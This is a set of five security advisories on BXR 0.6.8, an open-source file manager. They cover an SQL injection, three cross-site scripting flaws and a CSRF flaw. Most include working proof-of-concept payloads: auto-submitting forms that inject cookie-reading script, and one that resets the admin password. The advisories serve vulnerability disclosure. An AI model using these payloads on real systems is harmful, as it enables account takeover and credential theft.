==============================================
Vulnerability ID: HTB22506
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_bxr.html
Product: BXR
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/bxr ) 
Vulnerable Version: 0.6.8 and Probably Prior Versions
Vendor Notification: 22 July 2010 
Vulnerability Type: SQL Injection
Status: Fixed by Vendor
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the /folder/list script to properly sanitize user-supplied input in "order_by" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

Attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/folder/list?order_by=filesize'+SQL
Solution: Upgrade to the most recent version

==============================================
Vulnerability ID: HTB22505
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_bxr_search.html
Product: BXR
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/bxr ) 
Vulnerable Version: 0.6.8 and Probably Prior Versions
Vendor Notification: 22 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /search/show_results script to properly sanitize user-supplied input in "search[query]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/search/show_results" method="post"  name="main" >

<input type="hidden" name="search_type" value="filename" />
<input type="hidden" name="search[query]" value='1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="commit" value="Find!" />

</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version

==============================================
Vulnerability ID: HTB22507
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_bxr_1.html
Product: BXR
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/bxr ) 
Vulnerable Version: 0.6.8 and Probably Prior Versions
Vendor Notification: 22 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /file/do_the_upload script to properly sanitize user-supplied input in "tag_1" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. In file upload form insert into "Tag 1" field tag named like mytagname"><script>alert(document.cookie)</script> and upload it.
Solution: Upgrade to the most recent version

==============================================
Vulnerability ID: HTB22504
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_bxr.html
Product: BXR
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/bxr ) 
Vulnerable Version: 0.6.8 and Probably Prior Versions
Vendor Notification: 22 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/settings/update_settings" script to properly sanitize user-supplied input in "setting[site_title]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/settings/update_settings" method="post"  name="main" >

<input type="hidden" name="setting[site_title]" value='BXR File Management System"><script>alert(document.cookie)</script>' />
<input type="hidden" name="setting[site_keywords]" value="BXR, Open Source File Management System" />
<input type="hidden" name="setting[site_description]" value="The Free, Open Source, Ruby on Rails File Management System." />
<input type="hidden" name="setting[let_users_change_default_folder]" value="0" />
<input type="hidden" name="setting[use_ferret]" value="0" />
<input type="hidden" name="setting[overwrite_existing_files]" value="0" />
<input type="hidden" name="commit" value="Update Settings" />

</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version

==============================================
Vulnerability ID: HTB22503
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_bxr.html
Product: BXR
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/bxr ) 
Vulnerable Version: 0.6.8 and Probably Prior Versions
Vendor Notification: 22 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Fixed by Vendor
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/user/update" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/user/update/1" method="post" name="main" >

<input type="hidden" name="user[name]" value="admin" />
<input type="hidden" name="user[email]" value="myemail@example.com" />
<input type="hidden" name="user[password]" value="123" />
<input type="hidden" name="user[password_confirmation]" value="123" />
<input type="hidden" name="belongs_to_group[1]" value="yes" />
<input type="hidden" name="user[default_folder_id]" value="1" />
<input type="hidden" name="commit" value="Save" />

</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version